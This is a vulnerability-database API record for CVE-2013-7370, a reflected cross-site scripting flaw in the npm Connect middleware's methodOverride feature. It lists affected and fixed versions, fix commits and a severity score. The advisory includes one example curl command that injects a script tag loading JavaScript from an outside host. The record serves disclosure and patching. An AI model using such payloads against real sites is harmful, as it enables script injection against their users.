Look up vulnerabilities affecting packages.

GET /api/vulnerabilities/30484?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/30484?format=api",
    "vulnerability_id": "VCID-nbgt-whdd-xyf9",
    "summary": "methodOverride Middleware Reflected Cross-Site Scripting\nConnect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot [method] [url]\" content. The method was not properly encoded for output in the browser.\n\n\n###Example:\n```\n~ curl \"localhost:3000\" -d \"_method=<script src=http://nodesecurity.io/xss.js></script>\"\nCannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> /\n```\n\n###Credit:\n[Sergio Arcos](https://twitter.com/martes_trece)\n\n###History\n(2013-06-27) Bug reported:\nhttps://github.com/senchalabs/connect/issues/831\n\n(2013-06-27) First fix: escape req.method output\nhttps://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135\n\n(2013-06-27) Second fix: whitelist\nhttps://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a",
    "aliases": [
        {
            "alias": "CVE-2013-7370"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/6514?format=api",
            "purl": "pkg:npm/connect@2.8.1",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.1"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/6513?format=api",
            "purl": "pkg:npm/connect@2.8.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-81fd-hg84-jkcm"
                },
                {
                    "vulnerability": "VCID-ff4q-8qw9-dfc1"
                },
                {
                    "vulnerability": "VCID-nbgt-whdd-xyf9"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.0"
        }
    ],
    "references": [
        {
            "reference_url": "https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json",
            "reference_id": "3",
            "reference_type": "",
            "scores": [
                {
                    "value": "6.5",
                    "scoring_system": "cvssv3",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json"
        }
    ],
    "weaknesses": [],
    "exploits": [],
    "severity_range_score": "6.5 - 6.5",
    "exploitability": null,
    "weighted_severity": null,
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nbgt-whdd-xyf9"
}